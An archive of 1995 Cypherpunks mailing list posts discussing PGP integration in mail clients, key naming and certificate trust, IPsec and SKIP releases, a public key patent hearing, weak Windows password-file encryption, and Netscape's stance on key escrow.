On 29 Nov 95 at 3:30, Anonymous wrote:

: ----- wake-up rant ON -----
:
: On 28 Nov 95 at 12:16, Lynne L. Harrison wrote:
:
: > At 09:52 AM 11/28/95 +0000, you wrote:
: > >Anyone done anything regarding PGP hooks into Pegasus Mail?
: > >I'm running it at home now (SLIPped into my Linux box), and
: > >I'd like to find a way to integrate PGP into Pegasus Mail.
: > >
: > >Thanks in advance for any replies...
: >
: > Ed -
: >
: > I haven't heard of anything re: "PGP hooks into Pegasus
: > Mail". At one time, Eudora and ViaCrypt were discussing it
: > but, from what I heard, those discussions fizzled out.
:
: > The easiest way to *integrate* is to use a front end program.
:
: I find it bizarre that what little is going on in real integration of PGP for
: e-mail users is not mentioned on cp, perhaps unknown, certainly not of interest
: to those who should be interested.
: [clip]
:
: Do a million registered users and an e-mail program with hooks already
: originating outside the U.S. penetrate anyone's consciousness?
:
: ----- wake-up rant OFF -----

-----BEGIN PGP SIGNED MESSAGE-----

This really should be cross posted to 'the future will be easy to use' too.

I subscribed to the cypherpunks list specifically to see what was going on with Pegasus / PGP now that David Harris has put his promised hooks into V. 2.2

For those who don't know, Pegasus is available for DOS, Windows, and the MAC. The windows version (and if history is any guide, shortly the MAC and DOS version will) has hooks for user definable encryption, decryption, signing, and signature verification. Distribution lists, an address book that can include aliases and a picture can be associated with an alias as well as user defined notes. Mail filtering rules. It's Freeware.

--
JHupp at gensys.com |For PGP Public Key:
http://gensys.com |finger jhupp at gensys.com
All cats are not gray after midnight. Endless variety--

From jamesd at echeque.com Tue Nov 28 23:14:47 1995
From: jamesd at echeque.com (James A. Donald)
Date: Wed, 29 Nov 1995 15:14:47 +0800
Subject: The future will be easy to use
Message-ID: <199511290659.WAA19886@blob.best.net>

At 01:03 PM 11/28/95 EST, Carl Ellison wrote:
>That's true. What the user would have to see is some icon (or, for
>text-bound folks, a temporary unique string) until the user chooses and
>assigns the appropriate alias. That icon would have no meaning by itself.
>It would acquire a meaning by being associated with some message or set of
>messages:

Better method:

Creator of the key names it: Usually after himself or his role: The recipient's key database detects and resolves cases where two different keys have identical names in accordance with certification rules.

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From jamesd at echeque.com Tue Nov 28 23:21:52 1995
From: jamesd at echeque.com (James A.
Donald) Date: Wed, 29 Nov 1995 15:21:52 +0800 Subject: The future will be easy to use Message-ID: <199511290707.XAA24211@blob.best.net> At 03:30 PM 11/28/95 EST, Carl Ellison wrote: > Of course. This isn't the base case. We would have some keys which I sign > based on my own personal knowledge; things handed to me by people I know; > some possibly published in the paper where the real key owner would see the > claim and be able to contest it. You are making the same erroneous assumption that Phil made when he designed the Web of trust: You assume that it is important and interesting to link key ID's to physical bodies. This is usually not the case: Linking key ID's to home web pages etc is not only easier -- it is also usually more interesting and important. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From futplex at pseudonym.com Tue Nov 28 23:46:58 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 29 Nov 1995 15:46:58 +0800 Subject: GOST for sale In-Reply-To: Message-ID: <199511290728.CAA01862@thor.cs.umass.edu> Mats writes: > JETICO INC., located in Finland (Tammerfors), introduced > a new crypto system on the world market last week. It's > based on GOST, the Russian federal standard algorithm. > This product, called BestCrypt, is implemented at least > partly in hardware. Alledgedly it uses 'GOST 28147-89', > whatever that stands for. A DejaNews search for "BestCrypt" turned up an announcement by Sergey Frolov in comp.security.misc on November 14th. According to him, it implements GOST, single DES, and IDEA. They have DOS and Windows versions. 
He says [big sic for this quote]: All algorithm available simultaneosly - you may change algorithm for your data easy - it's look like to change the password... I have non-commercial demo version of the product (370 Kb arjed distributive) and I can send it to people who will be interested in it. -Futplex From cactus at hks.net Wed Nov 29 00:59:16 1995 From: cactus at hks.net (Leslie Todd Masco) Date: Wed, 29 Nov 1995 16:59:16 +0800 Subject: Untitled Message-ID: <199511290849.DAA08036@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199511282257.RAA00774 at jekyll.piermont.com>, Perry E. Metzger wrote: > >Anonymous writes: >> Is this list archived so that I can try to look stuff up before asking >> stupid questions? > >Yes. Check www.hks.net (I think -- maybe its hks.com). http://www.hks.net/cpunks/index.html It's (still!) in flux, though and hasn't quite gotten those useful search functions yet. I'd flame the maintainer, but... - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMLwesCoZzwIn1bdtAQHStAF+I0PlsickMkTsVFcbLPMMRPsvap+yD2gR etQjdnAivni4EzlDH+++XfxX+VpkmX8o =DhdR -----END PGP SIGNATURE----- From rschlafly at attmail.com Wed Nov 29 01:07:13 1995 From: rschlafly at attmail.com (Roger Schlafly) Date: Wed, 29 Nov 1995 17:07:13 +0800 Subject: PKP patent hearing Message-ID: Hearing on the validity of the public key patents ================================================= On Wed., Dec. 6, 1995, 10:00 am, San Jose Federal Bldg, there will be a hearing on the validity of the Diffie-Hellman, Hellman-Merkle, RSA, and Schnorr patents. 
There are also some annoying procedural technicalities that are also scheduled to be heard, so we may not get to the patents right away. (antitrust standing, sufficiency of pleadings, admissibility of evidence, etc.) Details: Schlafly v. Public Key Partners & RSA Data Security Case C-94-20512 SW PVT Hon. Spencer Williams At the San Jose federal building, 280 S First St. Ask the US Marshals where Williams' courtroom is while you go thru the airport-style security. Court Clerk: 408/535-5364 The Federal Bldg is in downtown San Jose, between 101, 880, and 280. I will take 280 to SJ, go north on 87, right on the first exit, and park in the first convenient lot or garage. There is some street parking, but the SJ meter maids are very efficient. If you come from the north, you may want to take 87 or the Almaden Expwy. (I get those mixed up.) The judge is used to lawyers wearing suits, so try to wear something that won't appear disrespectful. Roger Schlafly phone: 408-476-3550 CompuServe: 76646,323 US Mail: PO Box 1680, Soquel, CA 95073 USA Internet: rschlafly at attmail.com From attila at primenet.com Wed Nov 29 01:44:04 1995 From: attila at primenet.com (attila) Date: Wed, 29 Nov 1995 17:44:04 +0800 Subject: The future will be easy to use In-Reply-To: <199511281801.NAA00386@jekyll.piermont.com> Message-ID: what about the Sun release announced today? --it is fully functional with DES and 3xDES, DH negotiation, etc. and is coded for either sun 4.1.3 or gcc compilers? Check out http://skip.incog.com. source to the SKIP key management and IP layer encryption package for SunOs 4.x. On Tue, 28 Nov 1995, Perry E. Metzger wrote: > > Jonathan Zamick writes: > > This discussion was based on a group of people getting together to create > > a new easy to use package for handling keys and such. The government is > > going to try to take a dominant stance, and mandate elements of it. > > So we can ignore tem. Big deal. They have no laws with which to > enforce their desires. 
> > > However, it is possible, even in an antagonistic relationship, to develop > > positive feedback. > > Who cares? An hour spent talking to an idiot from Washington is better > spent writing good code unless there is a law pending in congress, in > which case you are probably better off paying someone who knows what > they are doing to do the talking for you. > > > Returning to the original topic though, do we want to get a smaller list > > together to spec out some ideas for the project that was discussed? A > > simple, transparent, tool which would allow people to use strong encryption > > without having to think about it? > > You mean, like IPSEC/Photuris? I'll be running IPSEC (but sadly not > Photuris, although I'll be trying to port Aggelos Keromytis' version > at some point) on my laptop at the IETF meeting in Dallas (provided > that I can buy a laptop in time.) > > There are three things we are currently missing in the architecture, > IMHO. > > 1) We need a certificate system to replace X.509 and that plays nicely > with distributed databases. > 2) We need to implement the Eastlake/Kaufman method for embedding > certificates in the DNS or something similar. > 3) We need a good entity naming model. > > Given all those being implemented, sometime soon I can see people > telnetting or ftping hither and thither without ever noticing or > caring that their sessions are completely encrypted. > > We also have the following need: > > 4) A good MIME mailer (that looks like NeXT Mail or something like it) > which has hooks for something MOSSlike that uses the same > certificate infrastructure described in 1-3 above. > 5) SHTTP capable browsers that also use 1-3 listed above. > > .pm > From shamrock at netcom.com Wed Nov 29 02:37:56 1995 From: shamrock at netcom.com (Lucky Green) Date: Wed, 29 Nov 1995 18:37:56 +0800 Subject: (fwd) Like FV with Crypto ... 'Cept Different ... 
Message-ID: Robert forwarded some propaganda on yet another Internet payment system: > WebTrader can be used as a stand-alone Internet application or in >conjunction with SBT's Pro Series 3.0i accounting software. WebTrader has a >suggested retail price of $1,295. ^^^^^^^^^^^^^^^^ They can't be serious. Why would you want to pay $1,300 for a payment system, when you can get an Ecash merchant account for a fraction of what Checkfree is charging? -- Lucky Green PGP encrypted mail preferred. From jcobb at ahcbsd1.ovnet.com Wed Nov 29 06:07:43 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Wed, 29 Nov 1995 22:07:43 +0800 Subject: No Privacy Right in US ? Message-ID: Friend, Edupage, 28 November 1995, reports: ONLINE ANONYMITY IS ALL RELATIVE America Online has revealed the real name of a subscriber who called herself "Jenny TRR" to a Caribbean resort owner and dive instructor who claim they were defamed in remarks she posted on an AOL bulletin board. AOL gave the subscriber a chance to object to the action, but says she didn't attempt to fight the subpoena. AOL's assistant general counsel says the service doesn't disclose information about electronic mail, which is protected by the Electronic Communications Privacy Act, unless it [ electronic mail ] is part of a criminal investigation. The item cites: Wall Street Journal 24 Nov 95 B1. There's two types of criminal investigations: those of crimes and those that are crimes. Cordially, Jim NOTE: To subscribe to Edupage send a message to: listproc at educom.unc.edu and in the body of the message type: subscribe edupage Joe Louis (assuming that your name is Joe Louis; if it's not, substitute your own name). From rsalz at osf.org Wed Nov 29 06:09:51 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 29 Nov 1995 22:09:51 +0800 Subject: The future will be easy to use Message-ID: <9511291354.AA16998@sulphur.osf.org> >There is more to this problem than how it is that I trust the key.
There >is also what I trust it for. ... >It is hard to see how to record the information about how much I trust the >receipent's systems security. Bingo! This is one of the hard parts of certificate authorities; just what are you attesting to? The American Bar Association has a big document for public review that addresses what this might mean; there are a couple of RFC's that specify CA policies (one from COST in Sweden, I think), and RSA and/or Verisign will give you their policy in hardcopy. In x.509v3 certificates, there is an extensible field where the key-signer can put arbitrary data. The intent is apparently that you put the ISO object-ID (you know, those funny 1.3.2.11.... numbers) of the policy document. There is, of course, no way to interpret the semantics of this electronically. It will be interesting to see how various companies address this issue, for example as they start to support arbitrary CA's in browsers or servers while doing commerce over the web. /r$ From Alan.Pugh at internetMCI.COM Wed Nov 29 06:30:17 1995 From: Alan.Pugh at internetMCI.COM (amp) Date: Wed, 29 Nov 1995 22:30:17 +0800 Subject: Diskless "Eunuchs" Machines Likely to Fail Message-ID: <01HY7L2XIX3M922UYS@MAIL-CLUSTER.PCY.MCI.NET> -- [ From: amp * EMC.Ver #2.3 ] -- -----BEGIN PGP SIGNED MESSAGE----- From: Timothy C. May \ Internet: (tcmay at got.net) TM> I'm skeptical of the "Diskless Internet Box = Telephone" analogy. TM> Folks I know who are not computer-savvy, or who have other things TM> they'd rather be doing, are not likely, as I see it, to buy boxes TM> that still require them to type messages to other people but that TM> don't allow them to download and save the interesting stuff they TM> find. TM> The telephone appealed to those who truly wanted to "just keep TM> talking"...that was the beauty of it. Most people don't know how to TM> touch-type, and typing by hunting-and-pecking is painful and unnatural TM> for most people. 
i guess it kinda depends upon the epoch in which you grow up. when telephones were first introduced, it didn't seem as natural to people as it does for us today. i've got a copy of the encyclopedia britannica published in 1903 that has some _fascinating_ stuff on telecommunications. (i'm in the process of scanning it in. anyone who is interested in it can email me and i'll send it to you when i'm done. 1903=no copyright) i've seen people's typing skills improve remarkably just through sheer repetition. i think that hunt-and-peck falls to look-and-peck if you find yourself typing to any serious degree rather quickly. TM> A couple of years ago "the computer for the rest of us" was said to be TM> a pen-based Newton-type machine, now it is said to be a diskless, TM> memory-limited "Eunuchs" machine. unless memory becomes _real cheap_ real fast, diskless workstations won't do. i don't see why it would be so hard for those pushing these machines to add enough disk to make it usable and still stay cheap. otoh, i don't think the internet is enough of a pull for people to want machines like this even if they did have local storage. i figure most people want computers to do something more for them than send e-mail. hell, i can send e-mail with a modem and dumb terminal. (been there-done that). i think the thing that will kill this idea will be the simple fact that people expect a computer to do more than what those pushing this 'technology' think they do. TM> I see a greater chance that home game machines, such as the 3DO and Sony TM> PlayStation machines will get Web browsers done for them than I do that TM> people will buy machines that are so limited. good call. i think people will soon be expecting more out of those game machinges than they currently do. i know i sure as hell would given the price. why can't current came machines support telecommunications? the modem i'm using to send this message is running on a dsp chip.
i remember playing falcon-at via modem several years ago. it was a hoot even at the bauds available then. at 14.4 or better it would be a real hoot. TM> The only relevance of this whole topic to Cypherpunks TM> is....is....minimal. same here. however, what is happening in the computer business does have _some_ relevance to crypto as we have to see where the market is heading. amp <0003701548 at mcimail.com> (since 10/31/88) PGP Key = 57957C9D PGP FP = FA 02 84 7D 82 57 78 E4 E2 1C 7B 88 62 A6 F9 F7 November 29, 1995 18:18 From Alan.Pugh at internetMCI.COM Wed Nov 29 06:30:19 1995 From: Alan.Pugh at internetMCI.COM (amp) Date: Wed, 29 Nov 1995 22:30:19 +0800 Subject: The future will be easy to use Message-ID: <01HY7L3OU4XE922UYW@MAIL-CLUSTER.PCY.MCI.NET> -- [ From: amp * EMC.Ver #2.3 ] -- -----BEGIN PGP SIGNED MESSAGE----- From: Jack P. Starrantino \ Internet: (jps at monad.semcor.com) JS> I bring nothing cypher-wise. I would be willing to help walk the JS> s/w-engineering dog and to write Motif/X/socket if the chosen platform JS> is UN*X, however. JS> So, from an engineering standpoint, what should the "future" look JS> like? unfortunately, it appears to me that if you _really_ want encryption to be universal, it's gotta be done on windoze, it's gotta be point-n-click and seamless to the mail application. i would prefer it if the masses would use a real operating system, (no o/s wars please.
i started in a mini/mainframe environment and simply don't think dos/windoze qualify your mileage may vary), but that just ain't the way it is. would netscape be selling at $130+ if they only wrote for unix? my 2 cents amp <0003701548 at mcimail.com> (since 10/31/88) PGP Key = 57957C9D PGP FP = FA 02 84 7D 82 57 78 E4 E2 1C 7B 88 62 A6 F9 F7 November 29, 1995 17:40 From jsw at netscape.com Wed Nov 29 06:42:20 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 29 Nov 1995 22:42:20 +0800 Subject: Certificate Authorities? In-Reply-To: <199511290139.UAA02214@cmyk.warwick.com> Message-ID: <30BBC98D.3BD3@netscape.com> Harry S. Hawk wrote: > As a Cypberpunk, a reporter and a corporate user of java/hot > java/netscape not only should you do that but have a way of locking in > various class libs.. E.g. if I want to change the security class > (but don't want my users to do so..) there needs to be a way.. THat > SHOULD be in 2.0. This is all stuff we are looking at. It will not be in 2.0 though. There is a lot of functionality in 2.0 that should not have to wait for this. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jps at monad.semcor.com Wed Nov 29 06:48:49 1995 From: jps at monad.semcor.com (Jack P.
Starrantino) Date: Wed, 29 Nov 1995 22:48:49 +0800 Subject: The future will be easy to use In-Reply-To: <199511280435.UAA08732@blob.best.net> Message-ID: <9511291431.AA14541@monad.semcor.com> James A. Donald writes > Specs, anyone? > > I suggest a few requirements: > > Store the keys, and information about the keys in a *real* database > ... Is this worth the complexity/cost? I'd have thought that the amount of data involved would be small enough that index hashing would be overkill, and I can't think of any operations that would require a full up db engine. Am I missing something? jps -- Jack P. Starrantino (215) 674-0200 (voice) SEMCOR, Inc. (215) 443-0474 (fax) 65 West Street Road jps at semcor.com Suite C-100 Warminster, PA 18974 From joelm at eskimo.com Wed Nov 29 06:57:16 1995 From: joelm at eskimo.com (Joel McNamara) Date: Wed, 29 Nov 1995 22:57:16 +0800 Subject: Microsoft weak encryption Message-ID: <199511291447.GAA19250@mail.eskimo.com> Peter Gutmann has an interesting article in sci.crypt, demonstrating how weak Microsoft's encryption is with basic access control in Windows for Workgroups (I'm assuming Win95 uses the same algorithm). Essentially, he shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL files. I think a t-shirt is definitely in order for this. Anyone up for writing some bruting code? Joel From jcobb at ahcbsd1.ovnet.com Wed Nov 29 07:11:43 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Wed, 29 Nov 1995 23:11:43 +0800 Subject: Encrypted Email Message-ID: Connie, On 11 27 95 you asked Can anybody briefly summarize for me some options for encrypting email that are secure? I know about PGP but I need something for (my environment) with an easy to use interface (PC-Windows) - for use by people who really aren't very computer literate. The following item from 11 27 95 Computerworld 58 may be helpful: CommTouch Software, Inc. in San Mateo, Calif., announced a secure Internet E-mail package called Pronto Secure. 
It allows connected and disconnected users to send and encrypt Internet mail. It supports many Internet security protocols, such as Power One-Time Pad, Pretty Good Privacy, Privacy Enhanced Mail, Secure Multipurpose Internet Mail Extensions (S / MIME) and MIME Object Security Services. Pronto Secure, which will ship in March, will require users to replace their existing Internet mail systems.... CommTouch plans to ship by mid-1996 a security module that is Messaging Application Programming Interface-compliant and works with a user's existing mail [system]. At p 66 of the same issue, there's a listing of "Recent information security product announcements." CommTouch is listed there; its Internet address is micheleb at ipri.com and a single copy of Pronto Secure is US $299 list. ipri.com = InterActive Public Relations, Inc in 'Frisco. Cordially, Jim From jya at pipeline.com Wed Nov 29 07:42:20 1995 From: jya at pipeline.com (John Young) Date: Wed, 29 Nov 1995 23:42:20 +0800 Subject: WAY_lad Message-ID: <199511291529.KAA22826@pipe9.nyc.pipeline.com> 11-29-95. FiTi: "Information highway needs rules of the road, says report." Pointing out the possibility of technical incompatibilities and trade friction if companies are treated differently in different markets, the report outlines the case for a "global regulator" within the structure of the new World Trade Organisation. It points out that issues such as intellectual property rights, encryption and government control on cross-ownership have global rather than national aspects. "Encryption, for example, raises tricky and emotive issues connected with organised crime and national security and cannot be treated simply as a business problem." No revolution for software [Editorial] Today's software market is the way it is not because of some evil conspiracy in Seattle, Microsoft's home town, but because it meets most consumers' interests most of the time. The power to set standards follows from that success.
Changing technology widens the range of possible market structures, but does not affect customers' underlying needs and preferences. In the battle between the technologically possible and the economically attractive, economics always wins. WAY_lad (7 kb) FiTi on-line at for waylaying top article. From jya at pipeline.com Wed Nov 29 07:44:58 1995 From: jya at pipeline.com (John Young) Date: Wed, 29 Nov 1995 23:44:58 +0800 Subject: NOH_ide Message-ID: <199511291530.KAA23283@pipe9.nyc.pipeline.com> 11-29-95. Washrag: "Postal Service Awards Contracts to Develop Computer Kiosks." The Postal Service predicted "more than 10,000" kiosks could be installed in post offices, libraries and shopping malls "within the next few years." The Postal Service is the lead government agency on the project, one of several administration initiatives designed to provide the public with computer access to government information. "CIA, Pentagon Back NIMA 'Concept' Combining Spy Satellite Photo Units." The Pentagon and the CIA announced an agreement yesterday endorsing the "concept" of consolidating eight defense and intelligence agencies -- those responsible for managing spy satellite photos and related tasks -- into a new National Imagery and Mapping Agency. NOH_ide (10 kb) From perry at piermont.com Wed Nov 29 07:49:18 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 29 Nov 1995 23:49:18 +0800 Subject: SKIP Source Release is out! In-Reply-To: <9511290122.AA26147@monster.incog.com> Message-ID: <199511291534.KAA02780@jekyll.piermont.com> Tom Markson writes: > Check out http://skip.incog.com. We've released the source to the SKIP > key management and IP layer encryption package for SunOs 4.x. SKIP is a non-standard being pushed by Sun. Admittedly, it is available for FTP. However, thats just because I don't have an FTP site for the NRL IPsec + IPv6 stuff. Anyone who'd like to help me put the sources to the NRL IPsec + IPv6 implementation up for FTP is invited to get in touch. 
It will run on 4.4BSD machines (i.e. BSDI, NetBSD, FreeBSD, etc) and should be pretty portable to other similar Berkeley based machines. It won't "run out of the box" on NetBSD as it stands -- I should have it nicely packaged up to do that before the end of the week. Perry From adam at lighthouse.homeport.org Wed Nov 29 08:08:09 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Thu, 30 Nov 1995 00:08:09 +0800 Subject: key for Alice as promised (not) Message-ID: <199511291558.KAA15623@homeport.org> > > >Can you imagine?? I'm simply not willing to fool myself into thinking > > >that I ahve security by posting a key and using PGP. > > > > Unless you can post some proof that PGP is insecure, stop insisting it is. > > PGP is really not the issue. The issue is more my security and the > environment that I use PGP in. I don't have a trusted machine to run PGP > on. Anyone who wants to can come up to machine and copy my secret keyring > or they can even watch me typing my password in. Threat, please?? Do people often stand over your shoulder as you type? Enter your office, point guns at you, and take a backup of your entire computer? Have you considered putting the secret keyring on a floppy and locking it in your desk/safe when you're not actually in the office? (Or home..) > So, I don't fool myself, and I don't use PGP, except for things like > exchanging a one-time pad with someone when I've already sent the message > out across another delivery mechanism, like on a floppy delivered my > courier. I don't follow. You're claiming that PGP is good enough to transfer OTPads, but not good enough to sign pseudononymous messages? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From perry at piermont.com Wed Nov 29 08:11:09 1995 From: perry at piermont.com (Perry E.
Metzger) Date: Thu, 30 Nov 1995 00:11:09 +0800 Subject: The future will be easy to use In-Reply-To: Message-ID: <199511291555.KAA02851@jekyll.piermont.com> attila writes: > > what about the Sun release announced today? --it is fully functional > with DES and 3xDES, DH negotiation, etc. and is coded for either sun 4.1.3 > or gcc compilers? Check out http://skip.incog.com. source to the SKIP > key management and IP layer encryption package for SunOs 4.x. Ah, yes. The non-standard from Sun. It doesn't do D-H negotiation, by the way. It uses something I'd call inferior. Read the flames in ipsec and ipsec-dev for details. .pm From adam at lighthouse.homeport.org Wed Nov 29 08:17:48 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Thu, 30 Nov 1995 00:17:48 +0800 Subject: Microsoft weak encryption In-Reply-To: <199511291447.GAA19250@mail.eskimo.com> Message-ID: <199511291559.KAA15633@homeport.org> Joel McNamara wrote: | Peter Gutmann has an interesting article in sci.crypt, demonstrating how | weak Microsoft's encryption is with basic access control in Windows for | Workgroups (I'm assuming Win95 uses the same algorithm). Essentially, he | shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL | files. I think a t-shirt is definitely in order for this. While Peter did a nice job of showing how Windows stores passwords, my understanding is that those passwords are decrypted by Windows, and sent over the net in the clear. Seems much easier to snarf them there.. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From cme at TIS.COM Wed Nov 29 08:22:11 1995 From: cme at TIS.COM (Carl Ellison) Date: Thu, 30 Nov 1995 00:22:11 +0800 Subject: The future will be easy to use In-Reply-To: <199511290659.WAA19886@blob.best.net> Message-ID: <9511291555.AA25090@tis.com> -----BEGIN PGP SIGNED MESSAGE----- >Date: Mon, 27 Nov 1995 22:57:25 -0800 >From: "James A. 
Donald" > >At 01:03 PM 11/28/95 EST, Carl Ellison wrote: >>That's true. What the user would have to see is some icon (or, for >>text-bound folks, a temporary unique string) until the user chooses and >>assigns the appropriate alias. That icon would have no meaning by itself. >>It would acquire a meaning by being associated with some message or set of >>messages: > >Better method: Creator of the key names it: Usually after himself or >his role: The recipients key database detects and resolves cases >where two different keys have identical names in accordance with >certification rules. That's today's method, more or less. It doesn't address my needs. The name you pick for your key may or may not mean anything to me. It might be pronounceable, giving it some advantage over a radix-64 string, but it might also be non-unique, making it worthless as an identifier. What means something to me is whatever name (or symbol) I assign to the person behind the key in question. That's the one in my mind and therefore the only one of interest to me. You, however, don't know what's in my mind. You don't even know my preferred symbol set. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme | |Trusted Information Systems, Inc. 
http://www.tis.com/ | |3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2| |Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 | +--------------------------------------------------------------------------+ From smithmi at dev.prodigy.com Wed Nov 29 08:27:40 1995 From: smithmi at dev.prodigy.com (Michael Smith) Date: Thu, 30 Nov 1995 00:27:40 +0800 Subject: SKIP Source Release is out! Message-ID: <199511291606.LAA30779@tinman.dev.prodigy.com> Perry Metzger writes: >Anyone who'd like to help me put the sources to the NRL IPsec + IPv6 >implementation up for FTP is invited to get in touch. It will run on >4.4BSD machines (i.e. BSDI, NetBSD, FreeBSD, etc) and should be >pretty portable to other similar Berkeley based machines. What licensing requirements exist for people who might want to use this code in their products? In particular, does one need to obtain any licensing from RSA or Cylink? --Michael Smith smithmi at dev.prodigy.com From perry at piermont.com Wed Nov 29 08:34:52 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 30 Nov 1995 00:34:52 +0800 Subject: SKIP Source Release is out! In-Reply-To: <199511291606.LAA30779@tinman.dev.prodigy.com> Message-ID: <199511291612.LAA02926@jekyll.piermont.com> Michael Smith writes: > Perry Metzger writes: > > >Anyone who'd like to help me put the sources to the NRL IPsec + IPv6 > >implementation up for FTP is invited to get in touch. It will run on > >4.4BSD machines (i.e. BSDI, NetBSD, FreeBSD, etc) and should be > >pretty portable to other similar Berkeley based machines. > > What licensing requirements exist for people who might want to > use this code in their products?
In particular, does one need to > obtain any licensing from RSA or Cylink? No. It doesn't contain any public key stuff because it isn't the key management component. Its all available under a Berkeley style license, which permits unrestricted commercial use, and complies with RFC 1825, 1826, 1827, 1828 & 1829. Perry From mark at unicorn.com Wed Nov 29 08:38:57 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Thu, 30 Nov 1995 00:38:57 +0800 Subject: The future will be easy to use (fwd) Message-ID: On Tue, 28 Nov 1995, Patiwat Panurach wrote: > I feel sad when they say that the market for <1000 $ machines is nill, I > had so much fun and learned so much from my old machines. Personally, I just bought a 486/66 laptop, which would have cost almost $1000 with 170 MB hard disk, 4 MB of RAM and Linux (I paid a couple of hundred extra for a 500 MB disk)... I could have got a Pentium desktop for the same price if I'd wanted one. So I don't see that there's really a great advantage to a $ 500 diskless computer (and having worked on Sun 3/50s in the past, I know about all the disadvantages). ObCrypto/Security: My landlord bought himself a computer a couple of weeks ago after he'd lived without them for over forty years, and has been enthusing about how easy it makes it for him to do his accounts. He just read about these diskless machines in a magazine, and his first reaction was that there was no way he'd keep his accounts information on a remote server. Obviously people *are* more privacy-aware than they're often given credit for. Mark From sameer at c2.org Wed Nov 29 08:58:53 1995 From: sameer at c2.org (sameer) Date: Thu, 30 Nov 1995 00:58:53 +0800 Subject: ecash casino Message-ID: <199511291640.IAA28114@infinity.c2.org> Any enterprising cypherpunks in gambling-friendly jurisdictions interested? I figure it would make ecash take off.. and you'd get rich. 
-- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From jsw at netscape.com Thu Nov 30 01:00:08 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 30 Nov 95 01:00:08 PST Subject: Netscape gives in to key escrow In-Reply-To: <199511300644.WAA02011@infinity.c2.org> Message-ID: <30BD716E.5F69@netscape.com> sameer wrote: > > http://www.cnet.com/Central/News/govt.html > > Bad. Very Bad. And I was almost starting to like Netscape. Please don't give up on us yet. All press accounts I've read so far have lots of stuff attributed to Jim, but very little of it is actual quotes. There appears to be lots of paraphrasing and interpretation being done on the part of the reporters. The impression that I'm getting is that the press has blown a couple of small sound bites way out of proportion. The infoworld article that covers the same speech only devotes about 20% of the article to the key escrow topic, and is similarly devoid of actual quotes. I have not spoken to Jim about this, and I did not hear the talk myself, so I'm mostly reading between the lines here. After I saw the story earlier today I started asking around to see if the company had made any major policy shift in the direction of GAK, and wasn't able to turn up anything. If anything its the opposite. My feelings about key escrow, which were echo'd by several folks in management when I spoke to them today are: o Government mandated escrow would be a bad thing o There are some settings where escrow is good, in the corporate setting, or as a matter of person choice(to protect against loss of password) o The whole issue of escrow should be de-coupled from the export issue I don't want to go down in history as a facilitator of the totalitarian state, and I don't think anyone else here does either. I hope folks wait for press releases, product announcements, etc. 
before condemning us too much. Jim has made comments in the past that were quoted out of context, and blown way out of proportion to the point that some people believed that we were monitoring our user's every keystroke and sending it all back to the home office to generate huge demographic databases. I suspect that this is the same sort of thing, and I hope everyone will judge us by what we do. --Jeff PS - you won't find a LEF in the soon to be released SSL Version 3 spec... -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From cme at TIS.COM Wed Nov 29 09:04:48 1995 From: cme at TIS.COM (Carl Ellison) Date: Thu, 30 Nov 1995 01:04:48 +0800 Subject: The future will be easy to use In-Reply-To: <199511290707.XAA24211@blob.best.net> Message-ID: <9511291629.AA28948@tis.com> -----BEGIN PGP SIGNED MESSAGE----- >Date: Mon, 27 Nov 1995 23:05:29 -0800 >From: "James A. Donald" > >At 03:30 PM 11/28/95 EST, Carl Ellison wrote: >> Of course. This isn't the base case. We would have some keys which I sign >> based on my own personal knowledge; things handed to me by people I know; >> some possibly published in the paper where the real key owner would see the >> claim and be able to contest it. > >You are making the same erroneous assumption that Phil made when he >designed the Web of trust: You assume that it is important and >interesting to link key ID's to physical bodies. Thanks for that reminder. I am actually not bound to the notion of keys being only for people. I'm a defender of the rights of disembodied processes from way back :-). However, this particular discussion was focussed on people. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme | |Trusted Information Systems, Inc. 
